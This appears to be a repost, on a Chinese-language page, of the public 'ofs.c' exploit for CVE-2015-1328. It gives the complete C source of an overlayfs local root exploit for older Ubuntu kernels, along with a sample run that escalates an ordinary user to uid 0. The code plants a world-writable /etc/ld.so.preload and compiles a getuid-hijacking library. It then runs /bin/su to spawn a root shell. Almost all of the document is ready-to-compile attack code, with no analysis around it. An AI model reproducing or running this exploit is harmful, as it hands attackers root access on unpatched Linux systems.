CVE-2015-1328(本地提权漏洞) -

admin

1. /*
   
2. # Exploit Title: ofs.c - overlayfs local root in ubuntu
   
3. # Date: 2015-06-15
   
4. # Exploit Author: rebel
   
5. # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
   
6. # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
   
7. # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
   
8. 
   
9. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
   
10. CVE-2015-1328 / ofs.c
    
11. overlayfs incorrect permission handling + FS_USERNS_MOUNT
    
12. 
    
13. user@ubuntu-server-1504:~$ uname -a
    
14. Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    
15. user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
    
16. user@ubuntu-server-1504:~$ id
    
17. uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
    
18. user@ubuntu-server-1504:~$ ./ofs
    
19. spawning threads
    
20. mount #1
    
21. mount #2
    
22. child threads done
    
23. /etc/ld.so.preload created
    
24. creating shared library
    
25. # id
    
26. uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
    
27. 
    
28. greets to beist & kaliman
    
29. 2015-05-24
    
30. %rebel%
    
31. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
    
32. */
    
33. 
    
34. #include <stdio.h>
    
35. #include <stdlib.h>
    
36. #include <unistd.h>
    
37. #include <sched.h>
    
38. #include <sys/stat.h>
    
39. #include <sys/types.h>
    
40. #include <sys/mount.h>
    
41. #include <stdio.h>
    
42. #include <stdlib.h>
    
43. #include <unistd.h>
    
44. #include <sched.h>
    
45. #include <sys/stat.h>
    
46. #include <sys/types.h>
    
47. #include <sys/mount.h>
    
48. #include <sys/types.h>
    
49. #include <signal.h>
    
50. #include <fcntl.h>
    
51. #include <string.h>
    
52. #include <linux/sched.h>
    
53. 
    
54. #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");\nreadlink("/proc/self/exe", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, "/bin/su")) {\nunlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle("/bin/sh", "sh", "-i", NULL, NULL);\n}\n return _real_getuid();\n}\n"
    
55. 
    
56. static char child_stack[1024*1024];
    
57. 
    
58. static int
    
59. child_exec(void *stuff)
    
60. {
    
61. char *file;
    
62. system("rm -rf /tmp/ns_sploit");
    
63. mkdir("/tmp/ns_sploit", 0777);
    
64. mkdir("/tmp/ns_sploit/work", 0777);
    
65. mkdir("/tmp/ns_sploit/upper",0777);
    
66. mkdir("/tmp/ns_sploit/o",0777);
    
67. 
    
68. fprintf(stderr,"mount #1\n");
    
69. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
    
70. // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
    
71. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
    
72. fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
    
73. exit(-1);
    
74. }
    
75. file = ".access";
    
76. chmod("/tmp/ns_sploit/work/work",0777);
    
77. } else file = "ns_last_pid";
    
78. 
    
79. chdir("/tmp/ns_sploit/o");
    
80. rename(file,"ld.so.preload");
    
81. 
    
82. chdir("/");
    
83. umount("/tmp/ns_sploit/o");
    
84. fprintf(stderr,"mount #2\n");
    
85. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
    
86. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
    
87. exit(-1);
    
88. }
    
89. chmod("/tmp/ns_sploit/work/work",0777);
    
90. }
    
91. 
    
92. chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    
93. umount("/tmp/ns_sploit/o");
    
94. }
    
95. 
    
96. int
    
97. main(int argc, char **argv)
    
98. {
    
99. int status, fd, lib;
    
100. pid_t wrapper, init;
     
101. int clone_flags = CLONE_NEWNS | SIGCHLD;
     
102. 
     
103. fprintf(stderr,"spawning threads\n");
     
104. 
     
105. if((wrapper = fork()) == 0) {
     
106. if(unshare(CLONE_NEWUSER) != 0)
     
107. fprintf(stderr, "failed to create new user namespace\n");
     
108. 
     
109. if((init = fork()) == 0) {
     
110. pid_t pid =
     
111. clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
     
112. if(pid < 0) {
     
113. fprintf(stderr, "failed to create new mount namespace\n");
     
114. exit(-1);
     
115. }
     
116. 
     
117. waitpid(pid, &status, 0);
     
118. 
     
119. }
     
120. 
     
121. waitpid(init, &status, 0);
     
122. return 0;
     
123. }
     
124. 
     
125. usleep(300000);
     
126. 
     
127. wait(NULL);
     
128. 
     
129. fprintf(stderr,"child threads done\n");
     
130. 
     
131. fd = open("/etc/ld.so.preload",O_WRONLY);
     
132. 
     
133. if(fd == -1) {
     
134. fprintf(stderr,"exploit failed\n");
     
135. exit(-1);
     
136. }
     
137. 
     
138. fprintf(stderr,"/etc/ld.so.preload created\n");
     
139. fprintf(stderr,"creating shared library\n");
     
140. lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
     
141. write(lib,LIB,strlen(LIB));
     
142. close(lib);
     
143. lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
     
144. if(lib != 0) {
     
145. fprintf(stderr,"couldn't create dynamic library\n");
     
146. exit(-1);
     
147. }
     
148. write(fd,"/tmp/ofs-lib.so\n",16);
     
149. close(fd);
     
150. system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
     
151. execl("/bin/su","su",NULL);
     
152. }

复制代码